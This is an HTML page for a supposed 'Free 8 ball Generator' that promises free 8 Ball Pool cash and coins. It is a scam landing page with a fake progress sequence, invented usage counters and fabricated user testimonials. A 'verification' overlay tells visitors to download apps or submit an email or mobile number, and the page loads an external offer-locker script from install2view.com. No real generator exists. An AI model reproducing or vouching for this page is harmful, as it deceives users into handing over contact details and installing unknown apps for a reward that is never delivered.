<!DOCTYPE html>
<html>


<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<head>
<meta name="viewport" content="width=device-width, initial-scale=1" />
<link href="/fonts.googleapis.com/cssb77a.css?family=Josefin+Sans" rel="stylesheet">

<script src="/ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
<script src="js/jscript.js"></script>

<title>Free 8 ball Generator coins pool 2022</title>
</head>

<style>

html {
    background: url("img/bg.jpg") no-repeat center center fixed;
    background-size: cover;
}

body {
    color: white;
    text-align: center;
    font-family: 'Josefin Sans', sans-serif;
}

img {
    display: block;
    margin-left: auto;
    margin-right: auto;
}

.form-option {
    margin-left: 15px;
    margin-right: 30px;
    margin-bottom: 15px;
}

.input-form {
    background-color: #fff;
    background-image: none;
    border: 1px solid #ccc;
    border-radius: 4px;
    box-shadow: 0 1px 1px rgba(0, 0, 0, 0.075) inset;
    color: black;
    display: block;
    font-size: 14px;
    height: 20px;
    line-height: 1.42857;
    padding: 6px 12px;
    transition: border-color 0.15s ease-in-out 0s, box-shadow 0.15s ease-in-out 0s;
    vertical-align: middle;
    width: 100%;
    font-family: 'Josefin Sans', sans-serif;
}

.input-form::-moz-placeholder {
    color: #999;
    opacity: 55;
}

.input-command {
    border-radius: 6px;
    font-size: 18px;
    height: 28px;
    line-height: 1.33;
    padding: 10px 16px;
}

select.input-command {
    height: 46px;
    line-height: 46px;
}

.wrapper {
    padding: 0;
    margin: -136px auto 0;
}

.wrapper img {
    width: 60%;
}

.cash {
    background: url("img/cash.png") no-repeat scroll 10px center white;
    padding-left: 40px !important;
}

.coin {
    background: url("img/coin.png") no-repeat scroll 10px center white;
    padding-left: 40px !important;
}

.buttonstyle {
    border-radius: 10px;
    background: #01be00; /* For browsers that do not support gradients */
    background: -webkit-linear-gradient(#01be00, #006b02); /* For Safari 5.1 to 6.0 */
    background: -o-linear-gradient(#01be00, #006b02); /* For Opera 11.1 to 12.0 */
    background: -moz-linear-gradient(#01be00, #006b02); /* For Firefox 3.6 to 15 */
    background: linear-gradient(#01be00, #006b02); /* Standard syntax */
    border: none;
    color: white;
    padding: 16px 33px;
    display: inline-block;
    font-size: 33px;
    text-shadow: 1px 1px black;
    height: auto;
    box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2), 0 6px 20px 0 rgba(0, 0, 0, 0.19);
    font-family: 'Josefin Sans', sans-serif;
}

#progressbarcontainer {
    display: none;
    background: #222632;
    border-radius: 10px;
    border: 3px #353744 inset;
    position: relative;
    margin-left: auto;
    margin-right: auto;
    width: 90%;
    height: 50px;
}

#progressbar {
    border-radius: 9px;
    position: absolute;
    width: 10%;
    height: 100%;
    background: #7bdc13; /* For browsers that do not support gradients */
    background: -webkit-linear-gradient(#7bdc13, #067c0e); /* For Safari 5.1 to 6.0 */
    background: -o-linear-gradient(#7bdc13, #067c0e); /* For Opera 11.1 to 12.0 */
    background: -moz-linear-gradient(#7bdc13, #067c0e); /* For Firefox 3.6 to 15 */
    background: linear-gradient(#7bdc13, #067c0e); /* Standard syntax */
}

#progressbarlabel {
    line-height: 54px;
    text-align: center;
    color: white;
    font-family: 'Josefin Sans', sans-serif;
}

#main-tool {
    background: #353744;
    border-radius: 6px;
    border: 3px #353744 outset;
    max-width: 500px;
    margin: 100px auto 20px;
    padding: 50px;
    box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2), 0 6px 20px 0 rgba(0, 0, 0, 0.19);
}

#steps {
    background: #353744;
    border-radius: 6px;
    border: 3px #353744 outset;
    max-width: 500px;
    margin: 100px auto 20px;
    padding: 50px;
    box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2), 0 6px 20px 0 rgba(0, 0, 0, 0.19);
}

#comment {
    background: #353744;
    border-radius: 6px;
    border: 3px #353744 outset;
    max-width: 500px;
    margin: 100px auto 20px;
    padding: 50px;
    box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2), 0 6px 20px 0 rgba(0, 0, 0, 0.19);
}

#shield{
    margin-bottom: 5px;
    font-family: 'Josefin Sans', sans-serif;
}

#verifybg {
    height: 0%;
    width: 100%;
    left: 0;
    top: 0;
    position: fixed;
    z-index: 1;
    overflow-x: hidden;
    transition: 0.5s;
    background-color: rgb(0,0,0);
    background-color: rgba(0,0,0, 0.3);
}

#verify {
    margin-left: auto;
    margin-right: auto;
    border-radius: 6px;
    border: 3px #353744 outset;
    color: white;
    position: relative;
    background-color: #222632;
    box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2), 0 6px 20px 0 rgba(0, 0, 0, 0.19);
    width: 80%;
}

#verifycontent {
    margin-left: auto;
    margin-right: auto;
    width: 80%;
}

#gen1 {
    display: none;
}

#gen2 {
    display: none;
}

#gen3 {
    display: none;
}

#gen4 {
    display: none;
}

#gen5 {
    display: none;
}

#gen6 {
    display: none;
}

#gen7 {
    display: none;
}

#addcoinbarcontainer {
    position: relative;
    margin-left: auto;
    margin-right: auto;
    width: 60%;
    height: 30px;
    background: #222632;
    border-radius: 10px;
    border: 3px #353744 inset;
}

#addcoinbar {
    position: absolute;
    width: 1%;
    height: 100%;
    border-radius: 9px;
    background: #7bdc13; /* For browsers that do not support gradients */
    background: -webkit-linear-gradient(#7bdc13, #067c0e); /* For Safari 5.1 to 6.0 */
    background: -o-linear-gradient(#7bdc13, #067c0e); /* For Opera 11.1 to 12.0 */
    background: -moz-linear-gradient(#7bdc13, #067c0e); /* For Firefox 3.6 to 15 */
    background: linear-gradient(#7bdc13, #067c0e); /* Standard syntax */
}

#addcoinbarlabel {
    line-height: 30px;
    text-align: center;
    color: white;
    font-family: 'Josefin Sans', sans-serif;
}

#addcashbarcontainer {
    position: relative;
    margin-left: auto;
    margin-right: auto;
    width: 60%;
    height: 30px;
    background: #222632;
    border-radius: 10px;
    border: 3px #353744 inset;
}

#addcashbar {
    position: absolute;
    width: 1%;
    height: 100%;
    border-radius: 9px;
    background: #7bdc13; /* For browsers that do not support gradients */
    background: -webkit-linear-gradient(#7bdc13, #067c0e); /* For Safari 5.1 to 6.0 */
    background: -o-linear-gradient(#7bdc13, #067c0e); /* For Opera 11.1 to 12.0 */
    background: -moz-linear-gradient(#7bdc13, #067c0e); /* For Firefox 3.6 to 15 */
    background: linear-gradient(#7bdc13, #067c0e); /* Standard syntax */
}

#addcashbarlabel {
    line-height: 30px;
    text-align: center;
    color: white;
    font-family: 'Josefin Sans', sans-serif;
}

</style>
<body onload="updateyear()">

<div id="verifybg">
	<br>
	<br>
	<br>
	<div id="verify">
		<br>
		<br>
		<br>
		<div id="verifycontent">
			<img src="img/verifylogo.png" width="30%" />
			<h1>the reCAPTCHA v3 Verification REQUIRED</h1>
        <p>1. Solve the reCAPTCHA v3</p>
    		<p>2. Download 2 Free App (Run It for 30 Seconds)</p>
    		<p>3. or Complete an Offer on the List (Submit Your Email or Mobile Number)</p>
    		<p>4. Your Cash & Coins Will be Added to Your Game After This</p>
    		<center> <div data-captcha-enable="true"></div> </center>
        </div>
        <br>
        <br>
        <br>
    </div>
</div>

<div id="main-tool">
    <div class="wrapper">
        <img src="img/logo.png" />
    </div>

    <h1>Free 8 ball Generator coins pool 2022</h1>

    <div id="progressbarcontainer">
        <div id="progressbar">
		<div id="progressbarlabel">0%</div>
	</div>
    </div>
    <p><div id="progresslog"></div></p>

    <div id="gen7">
	<img src="img/bestcoin.png" width="30%" />
	<br>
	<div id="addcoinbarcontainer">
		<div id="addcoinbar">
			<div id="addcoinbarlabel">0</div>
		</div>
	</div>
    </div>

    <div id="gen6">
	<img src="img/bestcash.png" width="30%" />
	<br>
	<div id="addcashbarcontainer">
		<div id="addcashbar">
			<div id="addcashbarlabel">0</div>
		</div>
	</div>
    </div>

    <div id="gen5"><img src="img/vip.png" width="30%" /></div>
    <div id="gen4"><img src="img/usernameconfirm.png" width="30%" /></div>
    <div id="gen3"><img src="img/searchingusername.svg" width="30%" /></div>
    <div id="gen2"><img src="img/connectserversuccess.png" width="30%" /></div>
    <div id="gen1"><img src="img/connectserver.svg" width="30%" /></div>

    <div id="fillup">
        <div class="form-option">
	    <input id="username" class="input-form input-command" maxlength="30" type="text" placeholder="Username / Email Address">
        </div>

        <div class="form-option">
            <select id="device" class="input-form input-command">
	        <option>Windows</option>
	        <option>macOS</option>
	        <option>iOS</option>
	        <option>Android</option>
            </select>
        </div>

        <div class="form-option">
            <select id="cash" class="input-form cash input-command">
                <option value="50000">50,000</option>
                <option value="100000">100,000</option>
	        <option value="250000">250,000</option>
	        <option value="500000">500,000</option>
            </select>
        </div>

        <div class="form-option">
            <select id="coin" class="input-form coin input-command">
                <option value="50000">50,000</option>
                <option value="100000">100,000</option>
	        <option value="250000">250,000</option>
	        <option value="500000">500,000</option>
            </select>
        </div>

        <p><input id="shield" type="checkbox" checked><label for="shield"><b>FREE UPGRADE TO BLACK DIAMOND VIP CLUB</b></label></input></p>
        <button onclick="move()" class="buttonstyle">GENERATE</button>

        <p><b>TOTAL COINS+CASH GENERATED TODAY:</b><br><span id="resources">13693669</span></p>
        <p><b>TOTAL USERS ONLINE:</b>&nbsp;<span id="randomnumber">9999</span></p>
    </div>
</div>

<div id="steps">
    <h2>HOW TO USE</h2>
        <p>We offer unlimited cash & coins with this user-friendly generator in just 3 simple steps</p>
        <p><b>Step 1:</b> select your operating system</p>
        <p><b>Step 2:</b> choose how much cash & coins you need to generate</p>
        <p><b>Step 3:</b> click Generate Button and the system will start to generate cash & coins automatically</p>
        <p><b>Warning:</b> please use the generator only once per username in 24 hours or your account might be banned</p>
</div>

<div id="comment">
    <form class="comment">
        <h2>RECENT COMMENTS</h2>
        <fieldset id="comm1">
            <label class="input">
                <b>Joe0911</b> said:<br>Yasss!! It's real! Just received all my cash and coins!
                <img src="img/results.jpg" style="width: 80%;" />
                <br><br><i>Posted Today 1 Hour Ago</i>
            </label><br>
        </fieldset>
        <fieldset id="comm2" style="">
            <label class="input">
                <b>Jaysonm</b> said:<br>I love 8 Ball and this generator!
                <br><br><i>Posted Today 2 Hours Ago</i>
            </label><br>
        </fieldset>
        <fieldset>
            <label class="input">
                <b>Judy</b> said:<br>Great! It worked for me, but I won't tell my friends about this haha.
                <br><br><i>Posted 3 hours ago</i>
            </label><br>
        </fieldset>
        <fieldset>
            <label class="input">
                <b>EdwardPHazlett</b> said:<br> I thought it was a scam but I receive all the coins and cash after complete an offer and waiting for about 6 hours!
                <br><br>
                <img src="img/results2.jpg" style="width: 80%;" />
                <br><br><i>Posted 6 hours ago</i>
            </label><br>
        </fieldset>
        <fieldset>
            <label class="input">
                <b>Bethany Payne</b> said:<br> Please everyone don't tell anyone about this tool, I don't want it leaked to public.
                <br><br><i>Posted 9 hours ago</i>
            </label><br>
        </fieldset>
        <fieldset>
            <label class="input">
                <b>Kingof8Ball</b> said:<br> Here's my screenshot, I have been generating almost 10 times without any issue<br><br>
                <img src="img/results3.jpg" style="width: 80%;" />
                <br><br><i>Posted 1 day ago</i>
            </label><br>
        </fieldset>
        <fieldset>
            <section>
                <label class="textarea">
                    <textarea style="width: 90%" rows="3" name="review" id="review" placeholder="Please Enter Your Comment"></textarea>
                </label>
            </section>
            <div id="comments" class="row hide">
                <section class="col col-6">
                    <label class="input">
                        <input style="width: 90%" name="name" id="name" type="text" placeholder="Your Name">
                    </label>
                </section>
                <section class="col col-6">
                    <label class="input">
                        <input style="width: 90%" name="email" id="email" type="email" placeholder="Your Email Address">
                    </label>
                </section>
            </div>
        </fieldset>
        <fieldset>
            <center>Please post your results here after using the tool.</center>
        </fieldset>
    </form>
</div>

<p style="text-align: center !important;">Copyright <span id="year"></span></p>

</body>
<script type="text/javascript" src="https://install2view.com/cp/js/q8d4p"></script>


</html>
